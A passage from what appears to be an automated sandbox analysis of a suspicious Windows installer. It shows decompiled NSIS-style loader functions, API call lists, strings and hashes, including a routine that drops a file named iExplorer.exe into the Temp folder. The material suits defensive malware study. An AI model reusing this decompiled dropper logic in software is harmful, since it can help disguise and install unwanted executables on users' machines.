                                                                      								goto L22;
                                                                      							}
                                                                      							ShowWindow( *0x42a460, 5);
                                                                      							_t85 = "RichEd20.dll";
                                                                      							_t37 = LoadLibraryA(_t85);
                                                                      							__eflags = _t37;
                                                                      							if(_t37 == 0) {
                                                                      								M004092A2 = 0x3233;
                                                                      								LoadLibraryA(_t85);
                                                                      							}
                                                                      							_t82 = "RichEdit20A";
                                                                      							_t38 = GetClassInfoA(0, _t82, 0x42e7c0);
                                                                      							__eflags = _t38;
                                                                      							if(_t38 == 0) {
                                                                      								 *0x409298 = 0;
                                                                      								GetClassInfoA(0, _t82, 0x42e7c0);
                                                                      								 *0x42e7e4 = _t82;
                                                                      								 *0x409298 = 0x32;
                                                                      								RegisterClassA(0x42e7c0);
                                                                      							}
                                                                      							_t42 = DialogBoxParamA( *0x42f020,  *0x42e800 + 0x00000069 & 0x0000ffff, 0, E004038C7, 0);
                                                                      							E00401410(5);
                                                                      							return _t42;
                                                                      						}
                                                                      						L22:
                                                                      						_t34 = 2;
                                                                      						return _t34;
                                                                      					} else {
                                                                      						_t75 =  *0x42f020;
                                                                      						 *0x42e7d4 = _t28;
                                                                      						_v20 = 0x624e5f;
                                                                      						 *0x42e7c4 = E00401000;
                                                                      						 *0x42e7d0 =  *0x42f020;
                                                                      						 *0x42e7e4 =  &_v20;
                                                                      						if(RegisterClassA(0x42e7c0) == 0) {
                                                                      							L33:
                                                                      							__eflags = 0;
                                                                      							return 0;
                                                                      						}
                                                                      						_t12 =  &_v16; // 0x624e5f
                                                                      						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                      						 *0x42a460 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f020, 0);
                                                                      						goto L21;
                                                                      					}
                                                                      				} else {
                                                                      					_t75 =  *(_t80 + 0x48);
                                                                      					if(_t75 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					_t78 = 0x42dfc0;
                                                                      					E00405898( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x42f058, 0x42dfc0);
                                                                      					_t61 =  *0x42dfc0; // 0x0
                                                                      					if(_t61 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					if(_t61 == 0x22) {
                                                                      						_t78 = 0x42dfc1;
                                                                      						 *((char*)(E004054C8(0x42dfc1, 0x22))) = 0;
                                                                      					}
                                                                      					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                      					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
                                                                      						L15:
                                                                      						E004059A4(_t84, E0040549D(_t78));
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t67 = GetFileAttributesA(_t78);
                                                                      						if(_t67 == 0xffffffff) {
                                                                      							L14:
                                                                      							E004054E4(_t78);
                                                                      							goto L15;
                                                                      						}
                                                                      						_t96 = _t67 & 0x00000010;
                                                                      						if((_t67 & 0x00000010) != 0) {
                                                                      							goto L15;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00405CAA: GetModuleHandleA.KERNEL32(000000F1,0040570A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CAE
                                                                        • Part of subcall function 00405CAA: LoadLibraryA.KERNEL32(000000F1,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CBC
                                                                        • Part of subcall function 00405CAA: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                      • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,?,00000000,0040332B,?), ref: 004035A5
                                                                      • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,C:\Users\user\AppData\Local\Temp,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ), ref: 0040360F
                                                                      • lstrcmpiA.KERNEL32(?,.exe,0042DFC0,?,?,?,0042DFC0,C:\Users\user\AppData\Local\Temp,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,KERNEL32.dll,GetUserDefaultUILanguage), ref: 00403622
                                                                      • GetFileAttributesA.KERNEL32(0042DFC0,?,00000000,0040332B,?), ref: 0040362D
                                                                      • LoadImageA.USER32 ref: 00403676
                                                                      • RegisterClassA.USER32 ref: 004036BD
                                                                        • Part of subcall function 00405902: wsprintfA.USER32 ref: 0040590F
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D5
                                                                      • CreateWindowExA.USER32 ref: 0040370E
                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,0040332B,?), ref: 00403744
                                                                      • LoadLibraryA.KERNEL32(RichEd20.dll,?,00000000,0040332B,?), ref: 00403756
                                                                      • LoadLibraryA.KERNEL32(RichEd20.dll,?,00000000,0040332B,?), ref: 00403766
                                                                      • GetClassInfoA.USER32 ref: 00403776
                                                                      • GetClassInfoA.USER32 ref: 00403785
                                                                      • RegisterClassA.USER32 ref: 00403795
                                                                      • DialogBoxParamA.USER32 ref: 004037B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$RichEd20.dll$RichEdit20A$_Nb
                                                                      • API String ID: 914957316-2346161888
                                                                      • Opcode ID: 3bf7bc9d91704f54ca423aa9b2768270c7771e3ef50ab5c65afc550e0dda3af6
                                                                      • Instruction ID: ab409947a1a018540ba4f647caeb8d994822170a27dd8cdc698d056a643aef84
                                                                      • Opcode Fuzzy Hash: 3bf7bc9d91704f54ca423aa9b2768270c7771e3ef50ab5c65afc550e0dda3af6
                                                                      • Instruction Fuzzy Hash: DD61C6B1A04340BED320AF65AD45E273AACEB45749B84483FF545B32E2D73C9D018A3E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E00402C3A(void* __eflags, signed int _a4) {
                                                                      				struct HWND__* _v8;
                                                                      				long _v12;
                                                                      				long _v16;
                                                                      				void* _v20;
                                                                      				intOrPtr _v24;
                                                                      				long _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				intOrPtr _v44;
                                                                      				signed int _v48;
                                                                      				long _t50;
                                                                      				signed int _t54;
                                                                      				void* _t60;
                                                                      				intOrPtr* _t62;
                                                                      				long _t63;
                                                                      				signed int _t68;
                                                                      				signed int _t73;
                                                                      				signed int _t74;
                                                                      				long _t79;
                                                                      				signed int _t84;
                                                                      				intOrPtr _t87;
                                                                      				void* _t90;
                                                                      				signed int _t91;
                                                                      				signed int _t92;
                                                                      				signed int _t93;
                                                                      				void* _t95;
                                                                      				signed int _t98;
                                                                      				intOrPtr* _t99;
                                                                      
                                                                      				_v8 = 0;
                                                                      				_t50 = GetTickCount();
                                                                      				_t97 = "C:\\Users\\hardz\\Desktop";
                                                                      				_t95 = _t50 + 0x3e8;
                                                                      				_v16 = 0;
                                                                      				_v12 = 0;
                                                                      				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop", 0x400);
                                                                      				_t90 = E00405680(_t97, 0x80000000, 3);
                                                                      				_v20 = _t90;
                                                                      				 *0x409020 = _t90;
                                                                      				if(_t90 == 0xffffffff) {
                                                                      					return "Error launching installer";
                                                                      				}
                                                                      				E004054E4(_t97);
                                                                      				_t54 = GetFileSize(_t90, 0);
                                                                      				__eflags = _t54;
                                                                      				 *0x428c38 = _t54;
                                                                      				_t98 = _t54;
                                                                      				if(_t54 <= 0) {
                                                                      					L27:
                                                                      					__eflags =  *0x42f02c;
                                                                      					if( *0x42f02c == 0) {
                                                                      						goto L32;
                                                                      					}
                                                                      					__eflags = _v12;
                                                                      					if(_v12 == 0) {
                                                                      						L31:
                                                                      						_t99 = GlobalAlloc(0x40, _v28);
                                                                      						E00403112( *0x42f02c + 0x1c);
                                                                      						_push(_v28);
                                                                      						_push(_t99);
                                                                      						_push(0);
                                                                      						_push(0xffffffff);
                                                                      						_t60 = E00402EB4();
                                                                      						__eflags = _t60 - _v28;
                                                                      						if(_t60 == _v28) {
                                                                      							__eflags = _v48 & 0x00000001;
                                                                      							 *0x42f028 = _t99;
                                                                      							 *0x42f030 =  *_t99;
                                                                      							if((_v48 & 0x00000001) != 0) {
                                                                      								 *0x42f034 =  *0x42f034 + 1;
                                                                      								__eflags =  *0x42f034;
                                                                      							}
                                                                      							_t47 = _t99 + 0x44; // 0x44
                                                                      							_t62 = _t47;
                                                                      							_t92 = 8;
                                                                      							do {
                                                                      								_t62 = _t62 - 8;
                                                                      								 *_t62 =  *_t62 + _t99;
                                                                      								_t92 = _t92 - 1;
                                                                      								__eflags = _t92;
                                                                      							} while (_t92 != 0);
                                                                      							_t63 = SetFilePointer(_v20, 0, 0, 1); // executed
                                                                      							 *(_t99 + 0x3c) = _t63;
                                                                      							E00405641(0x42f040, _t99 + 4, 0x40);
                                                                      							__eflags = 0;
                                                                      							return 0;
                                                                      						}
                                                                      						goto L32;
                                                                      					}
                                                                      					E00403112( *0x414c30);
                                                                      					_t68 = E004030E0( &_a4, 4); // executed
                                                                      					__eflags = _t68;
                                                                      					if(_t68 == 0) {
                                                                      						goto L32;
                                                                      					}
                                                                      					__eflags = _v16 - _a4;
                                                                      					if(_v16 != _a4) {
                                                                      						goto L32;
                                                                      					}
                                                                      					goto L31;
                                                                      				} else {
                                                                      					do {
                                                                      						_t91 = _t98;
                                                                      						asm("sbb eax, eax");
                                                                      						_t73 = ( ~( *0x42f02c) & 0x00007e00) + 0x200;
                                                                      						__eflags = _t98 - _t73;
                                                                      						if(_t98 >= _t73) {
                                                                      							_t91 = _t73;
                                                                      						}
                                                                      						_t74 = E004030E0(0x420c38, _t91); // executed
                                                                      						__eflags = _t74;
                                                                      						if(_t74 == 0) {
                                                                      							__eflags = _v8;
                                                                      							if(_v8 != 0) {
                                                                      								DestroyWindow(_v8);
                                                                      							}
                                                                      							L32:
                                                                      							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                                      						}
                                                                      						__eflags =  *0x42f02c;
                                                                      						if( *0x42f02c != 0) {
                                                                      							__eflags = _a4 & 0x00000002;
                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                      								__eflags = _v8;
                                                                      								if(_v8 == 0) {
                                                                      									_t79 = GetTickCount();
                                                                      									__eflags = _t79 - _t95;
                                                                      									if(_t79 > _t95) {
                                                                      										_v8 = CreateDialogParamA( *0x42f020, 0x6f, 0, E00402BAE, "verifying installer: %d%%");
                                                                      									}
                                                                      								} else {
                                                                      									E00405CD4(0);
                                                                      								}
                                                                      							}
                                                                      							goto L22;
                                                                      						}
                                                                      						E00405641( &_v48, 0x420c38, 0x1c);
                                                                      						_t84 = _v48;
                                                                      						__eflags = _t84 & 0xfffffff0;
                                                                      						if((_t84 & 0xfffffff0) != 0) {
                                                                      							goto L22;
                                                                      						}
                                                                      						__eflags = _v44 - 0xdeadbeef;
                                                                      						if(_v44 != 0xdeadbeef) {
                                                                      							goto L22;
                                                                      						}
                                                                      						__eflags = _v32 - 0x74736e49;
                                                                      						if(_v32 != 0x74736e49) {
                                                                      							goto L22;
                                                                      						}
                                                                      						__eflags = _v36 - 0x74666f73;
                                                                      						if(_v36 != 0x74666f73) {
                                                                      							goto L22;
                                                                      						}
                                                                      						__eflags = _v40 - 0x6c6c754e;
                                                                      						if(_v40 != 0x6c6c754e) {
                                                                      							goto L22;
                                                                      						}
                                                                      						_a4 = _a4 | _t84;
                                                                      						_t93 =  *0x414c30; // 0xcbdc3
                                                                      						 *0x42f0c0 =  *0x42f0c0 | _a4 & 0x00000002;
                                                                      						_t87 = _v24;
                                                                      						__eflags = _t87 - _t98;
                                                                      						 *0x42f02c = _t93;
                                                                      						if(_t87 > _t98) {
                                                                      							goto L32;
                                                                      						}
                                                                      						__eflags = _a4 & 0x00000008;
                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                      							L15:
                                                                      							_v12 = _v12 + 1;
                                                                      							_t25 = _t87 - 4; // 0x4032c1
                                                                      							_t98 = _t25;
                                                                      							__eflags = _t91 - _t98;
                                                                      							if(_t91 > _t98) {
                                                                      								_t91 = _t98;
                                                                      							}
                                                                      							goto L22;
                                                                      						}
                                                                      						__eflags = _a4 & 0x00000004;
                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                      							break;
                                                                      						}
                                                                      						goto L15;
                                                                      						L22:
                                                                      						__eflags = _t98 -  *0x428c38; // 0xcbdc7
                                                                      						if(__eflags < 0) {
                                                                      							_v16 = E00405D07(_v16, 0x420c38, _t91);
                                                                      						}
                                                                      						 *0x414c30 =  *0x414c30 + _t91;
                                                                      						_t98 = _t98 - _t91;
                                                                      						__eflags = _t98;
                                                                      					} while (_t98 > 0);
                                                                      					__eflags = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						DestroyWindow(_v8);
                                                                      					}
                                                                      					goto L27;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C48
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop,00000400,?,?,?,?,?,?,004032C5,?), ref: 00402C68
                                                                        • Part of subcall function 00405680: GetFileAttributesA.KERNELBASE(00000003,00402C7B,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 00405684
                                                                        • Part of subcall function 00405680: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,?,004032C5,?), ref: 004056A6
                                                                      • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 00402C9E
                                                                      • DestroyWindow.USER32(00000000,00420C38,00000000,?,?,?,?,?,?,004032C5,?), ref: 00402DE9
                                                                      • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,004032C5,?), ref: 00402E25
                                                                      Strings
                                                                      • Null, xrefs: 00402D34
                                                                      • Inst, xrefs: 00402D1A
                                                                      • Error launching installer, xrefs: 00402C8B
                                                                      • soft, xrefs: 00402D27
                                                                      • "C:\Users\user\Desktop\aaVb1xEmrd.exe" , xrefs: 00402C41
                                                                      • verifying installer: %d%%, xrefs: 00402D9A
                                                                      • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E4C
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C44
                                                                      • C:\Users\user\Desktop, xrefs: 00402C4E, 00402C5A, 00402C75, 00402C95
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                      • API String ID: 2181728824-3178254277
                                                                      • Opcode ID: 5d902e2cbd0d5d68523bb18f4138170b908570dc3ca78ff5000b6e56de227859
                                                                      • Instruction ID: ac1a186a9ee24618264e6cd89058a0a33b03ee754d8ef6c6ef55bcd8238f1df4
                                                                      • Opcode Fuzzy Hash: 5d902e2cbd0d5d68523bb18f4138170b908570dc3ca78ff5000b6e56de227859
                                                                      • Instruction Fuzzy Hash: AC61A131E40204EBDB219FA5DE49B9EBAB4EF04754F60813BE500B62D2D7B89D45CB9C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00402EB4(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                      				signed int _v8;
                                                                      				long _v12;
                                                                      				void* _v16;
                                                                      				long _v20;
                                                                      				long _v24;
                                                                      				intOrPtr _v28;
                                                                      				char _v92;
                                                                      				void* _t68;
                                                                      				void* _t69;
                                                                      				long _t75;
                                                                      				intOrPtr _t80;
                                                                      				long _t81;
                                                                      				void* _t83;
                                                                      				int _t85;
                                                                      				void* _t98;
                                                                      				void* _t101;
                                                                      				long _t102;
                                                                      				signed int _t103;
                                                                      				long _t104;
                                                                      				int _t105;
                                                                      				intOrPtr _t106;
                                                                      				long _t107;
                                                                      				void* _t108;
                                                                      
                                                                      				_t103 = _a16;
                                                                      				_t98 = _a12;
                                                                      				_v12 = _t103;
                                                                      				if(_t98 == 0) {
                                                                      					_v12 = 0x8000;
                                                                      				}
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_v16 = _t98;
                                                                      				if(_t98 == 0) {
                                                                      					_v16 = 0x418c38;
                                                                      				}
                                                                      				_t66 = _a4;
                                                                      				if(_a4 >= 0) {
                                                                      					E00403112( *0x42f078 + _t66);
                                                                      				}
                                                                      				_t68 = E004030E0( &_a16, 4); // executed
                                                                      				if(_t68 == 0) {
                                                                      					L34:
                                                                      					_push(0xfffffffd);
                                                                      					goto L35;
                                                                      				} else {
                                                                      					if((_a19 & 0x00000080) == 0) {
                                                                      						if(_t98 == 0) {
                                                                      							while(_a16 > 0) {
                                                                      								_t104 = _v12;
                                                                      								if(_a16 < _t104) {
                                                                      									_t104 = _a16;
                                                                      								}
                                                                      								if(E004030E0(0x414c38, _t104) == 0) {
                                                                      									goto L34;
                                                                      								} else {
                                                                      									if(WriteFile(_a8, 0x414c38, _t104,  &_a12, 0) == 0 || _t104 != _a12) {
                                                                      										L29:
                                                                      										_push(0xfffffffe);
                                                                      										L35:
                                                                      										_pop(_t69);
                                                                      										return _t69;
                                                                      									} else {
                                                                      										_v8 = _v8 + _t104;
                                                                      										_a16 = _a16 - _t104;
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L45:
                                                                      							return _v8;
                                                                      						}
                                                                      						if(_a16 < _t103) {
                                                                      							_t103 = _a16;
                                                                      						}
                                                                      						if(E004030E0(_t98, _t103) != 0) {
                                                                      							_v8 = _t103;
                                                                      							goto L45;
                                                                      						} else {
                                                                      							goto L34;
                                                                      						}
                                                                      					}
                                                                      					_t75 = GetTickCount();
                                                                      					 *0x40b55c =  *0x40b55c & 0x00000000;
                                                                      					 *0x40b558 =  *0x40b558 & 0x00000000;
                                                                      					_t14 =  &_a16;
                                                                      					 *_t14 = _a16 & 0x7fffffff;
                                                                      					_v20 = _t75;
                                                                      					 *0x40b040 = 8;
                                                                      					 *0x414be8 = 0x40cbe0;
                                                                      					 *0x414be4 = 0x40cbe0;
                                                                      					 *0x414be0 = 0x414be0;
                                                                      					_a4 = _a16;
                                                                      					if( *_t14 <= 0) {
                                                                      						goto L45;
                                                                      					} else {
                                                                      						goto L9;
                                                                      					}
                                                                      					while(1) {
                                                                      						L9:
                                                                      						_t105 = 0x4000;
                                                                      						if(_a16 < 0x4000) {
                                                                      							_t105 = _a16;
                                                                      						}
                                                                      						if(E004030E0(0x414c38, _t105) == 0) {
                                                                      							goto L34;
                                                                      						}
                                                                      						_a16 = _a16 - _t105;
                                                                      						 *0x40b030 = 0x414c38;
                                                                      						 *0x40b034 = _t105;
                                                                      						while(1) {
                                                                      							_t101 = _v16;
                                                                      							 *0x40b038 = _t101;
                                                                      							 *0x40b03c = _v12;
                                                                      							_t80 = E00405D75(0x40b030);
                                                                      							_v28 = _t80;
                                                                      							if(_t80 < 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t106 =  *0x40b038; // 0x41a9fd
                                                                      							_t107 = _t106 - _t101;
                                                                      							_t81 = GetTickCount();
                                                                      							_t102 = _t81;
                                                                      							if(( *0x40928c & 0x00000001) != 0 && (_t81 - _v20 > 0xc8 || _a16 == 0)) {
                                                                      								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                      								_t108 = _t108 + 0xc;
                                                                      								E00404D69(0,  &_v92);
                                                                      								_v20 = _t102;
                                                                      							}
                                                                      							if(_t107 == 0) {
                                                                      								if(_a16 > 0) {
                                                                      									goto L9;
                                                                      								}
                                                                      								goto L45;
                                                                      							} else {
                                                                      								if(_a12 != 0) {
                                                                      									_v12 = _v12 - _t107;
                                                                      									_v8 = _v8 + _t107;
                                                                      									_t83 =  *0x40b038; // 0x41a9fd
                                                                      									_v16 = _t83;
                                                                      									if(_v12 < 1) {
                                                                      										goto L45;
                                                                      									}
                                                                      									L24:
                                                                      									if(_v28 != 1) {
                                                                      										continue;
                                                                      									}
                                                                      									goto L45;
                                                                      								}
                                                                      								_t85 = WriteFile(_a8, _v16, _t107,  &_v24, 0); // executed
                                                                      								if(_t85 == 0 || _v24 != _t107) {
                                                                      									goto L29;
                                                                      								} else {
                                                                      									_v8 = _v8 + _t107;
                                                                      									goto L24;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_push(0xfffffffc);
                                                                      						goto L35;
                                                                      					}
                                                                      					goto L34;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402F1B
                                                                      • GetTickCount.KERNEL32 ref: 00402FC2
                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00402FEB
                                                                      • wsprintfA.USER32 ref: 00402FFB
                                                                      • WriteFile.KERNELBASE(00000000,00000000,0041A9FD,7FFFFFFF,00000000), ref: 00403029
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CountTick$FileWritewsprintf
                                                                      • String ID: ... %d%%$8LA$8LA
                                                                      • API String ID: 4209647438-2839151062
                                                                      • Opcode ID: f9f5fb98028ea68bc9b92fb94d4a45197e988c3c07679da176d4706a4b7c1ea4
                                                                      • Instruction ID: 88e293ae79e6b65d43497011603f5605762881a31d59c16dd02ed21a4dce8fc4
                                                                      • Opcode Fuzzy Hash: f9f5fb98028ea68bc9b92fb94d4a45197e988c3c07679da176d4706a4b7c1ea4
                                                                      • Instruction Fuzzy Hash: 7F618E71902219EBCF10CF65DA48B9F7BB8EB40796F10417BE910B72D4D3789A40CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00401799(FILETIME* __ebx, void* __eflags) {
                                                                      				void* _t33;
                                                                      				void* _t41;
                                                                      				void* _t43;
                                                                      				FILETIME* _t49;
                                                                      				FILETIME* _t62;
                                                                      				void* _t64;
                                                                      				signed int _t70;
                                                                      				FILETIME* _t71;
                                                                      				FILETIME* _t75;
                                                                      				signed int _t77;
                                                                      				CHAR* _t81;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      
                                                                      				_t75 = __ebx;
                                                                      				_t81 = E00402A9D(0x31);
                                                                      				 *(_t85 - 0x34) = _t81;
                                                                      				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                                      				_t33 = E00405509(_t81);
                                                                      				_push(_t81);
                                                                      				if(_t33 == 0) {
                                                                      					lstrcatA(E0040549D(E004059A4(0x409be8, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                      				} else {
                                                                      					_push(0x409be8);
                                                                      					E004059A4();
                                                                      				}
                                                                      				E00405BD3(0x409be8);
                                                                      				while(1) {
                                                                      					__eflags =  *(_t85 + 8) - 3;
                                                                      					if( *(_t85 + 8) >= 3) {
                                                                      						_t64 = E00405C6C(0x409be8);
                                                                      						_t77 = 0;
                                                                      						__eflags = _t64 - _t75;
                                                                      						if(_t64 != _t75) {
                                                                      							_t71 = _t64 + 0x14;
                                                                      							__eflags = _t71;
                                                                      							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                      						__eflags = _t70;
                                                                      						 *(_t85 + 8) = _t70;
                                                                      					}
                                                                      					__eflags =  *(_t85 + 8) - _t75;
                                                                      					if( *(_t85 + 8) == _t75) {
                                                                      						E00405661(0x409be8);
                                                                      					}
                                                                      					__eflags =  *(_t85 + 8) - 1;
                                                                      					_t41 = E00405680(0x409be8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                      					__eflags = _t41 - 0xffffffff;
                                                                      					 *(_t85 - 8) = _t41;
                                                                      					if(_t41 != 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags =  *(_t85 + 8) - _t75;
                                                                      					if( *(_t85 + 8) != _t75) {
                                                                      						E00404D69(0xffffffe2,  *(_t85 - 0x34));
                                                                      						__eflags =  *(_t85 + 8) - 2;
                                                                      						if(__eflags == 0) {
                                                                      							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                      						}
                                                                      						L31:
                                                                      						 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t85 - 4));
                                                                      						__eflags =  *0x42f0a8;
                                                                      						goto L32;
                                                                      					} else {
                                                                      						E004059A4(0x40a3e8, 0x430000);
                                                                      						E004059A4(0x430000, 0x409be8);
                                                                      						E004059C6(_t75, 0x409be8, 0x40a3e8, " C:\Users\hardz\AppData\Local\Temp\iExplorer.exe",  *((intOrPtr*)(_t85 - 0x10)));
                                                                      						E004059A4(0x430000, 0x40a3e8);
                                                                      						_t62 = E0040529A(" C:\Users\hardz\AppData\Local\Temp\iExplorer.exe",  *(_t85 - 0x24) >> 3) - 4;
                                                                      						__eflags = _t62;
                                                                      						if(_t62 == 0) {
                                                                      							continue;
                                                                      						} else {
                                                                      							__eflags = _t62 == 1;
                                                                      							if(_t62 == 1) {
                                                                      								 *0x42f0a8 =  &( *0x42f0a8->dwLowDateTime);
                                                                      								L32:
                                                                      								_t49 = 0;
                                                                      								__eflags = 0;
                                                                      							} else {
                                                                      								_push(0x409be8);
                                                                      								_push(0xfffffffa);
                                                                      								E00404D69();
                                                                      								L29:
                                                                      								_t49 = 0x7fffffff;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L33:
                                                                      					return _t49;
                                                                      				}
                                                                      				E00404D69(0xffffffea,  *(_t85 - 0x34));
                                                                      				 *0x40928c =  *0x40928c + 1;
                                                                      				_t43 = E00402EB4( *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
                                                                      				 *0x40928c =  *0x40928c - 1;
                                                                      				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                                      				_t83 = _t43;
                                                                      				if( *(_t85 - 0x18) != 0xffffffff) {
                                                                      					L22:
                                                                      					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                                      				} else {
                                                                      					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                                      					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                                      						goto L22;
                                                                      					}
                                                                      				}
